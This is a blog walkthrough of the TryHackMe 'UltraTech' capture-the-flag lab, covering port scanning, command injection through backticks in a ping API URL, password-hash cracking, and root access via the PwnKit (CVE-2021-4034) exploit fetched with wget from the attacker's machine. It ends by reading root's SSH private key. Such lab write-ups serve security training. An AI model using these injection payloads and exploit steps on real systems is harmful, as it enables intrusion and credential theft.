TryHackMe: UltraTech

!#Tasks

##Task 1:

!>Deploy the machine

<>: Deploy the machine

> No answer needed

##Task 2 :

!>It’s enumeration time!

<>: Which software is using the port 8081?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.102.70

Ans: N******

<>: Which other non-standard port is used?

Command: sudo nmap -sT -p- -sV -T5 -oN nmap/all_ports 10.10.102.70

Ans: 3****

<>: Which software using this port?

Ans: A*****

<>: Which GNU/Linux distribution seems to be used?

Ans: U*****

<>: The software using the port 8080 is a REST api, how many of its routes are used by the web application?

Command: gobuster dir -u http://10.10.102.70:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Ans: *

>: Let’s check the sites

>: Scan the port we just found

Command: gobuster dir -u http://10.10.102.70:31331/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

>: Let’s look at the path from / js

>: Look at api.js

>: Let’s look at and check how the api we found works

>: After checking and pinging, everything looks great

##Task 3:

!>Let the fun begin

! There is a database lying around, what is its filename?

Url : http://10.10.102.70:8081/ping?ip=`ls`

! What is the first user’s password hash?

http://10.10.102.70:8081/ping?ip=`cat%20u****.**.******`

Yalniz birinin sifresi qirilir

! What is the password associated with this hash?

Url: https://www.md5online.org/md5-decrypt.html

>: Let’s check the entry with ssh

Command: ssh r00t@10.10.102.70

##Task 4

!>The root of all evil

!What are the first 9 characters of the root user’s private SSH key?

>: Let’s look at the vulnerabilities to gain authority

>: We can do it manually. But I will use Linpeas.sh, an automated tool

>: You can download the tool here:

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

>: Let’s start the transfer

>: From our terminal
Command: python3 -m http.server 80

>: From target terminal
Command: wget http://10.8.223.65/linpeas.sh

>: Give permission and get started
Command: chmod +x linpeas.sh
Command: ./linpeas.sh

We found some vulnerability

>: I decided to use CVE-2021–4034

>: You can download the exploit here

>: Let’s start the transfer

>: From our terminal

Command: python3 -m http.server 80

>: From target terminal

Command: wget http://10.8.223.65/pwnkit.c

>:Prepare and started

Command: gcc pwnkit.c -o exploit

Command: ./exploit

And now we are the root

Now let’s go and do the last task
Command : cat /root/.ssh/id_rsa

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Dell Precision 7730 17.3" Intel Core i7–8850H 32GB 512GB SSD NVIDIA Quadro P3200

Dell Precision 7730 17.3

My Software Career at FiveYears

Events and Logging in Solidity

Scaling and Managing Open Source Communities

a year of teaching in a coding bootcamp

8 Neat C++ Programming Tricks You Should Know

Image of laptop with code

Python Script To Change MAC Address

119 Branches of Bloat

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: Develpy

Tryhackme Archangel Writeup

Hack The Box — Remote Write-up

Dig Dug — A TryHackMe Writeup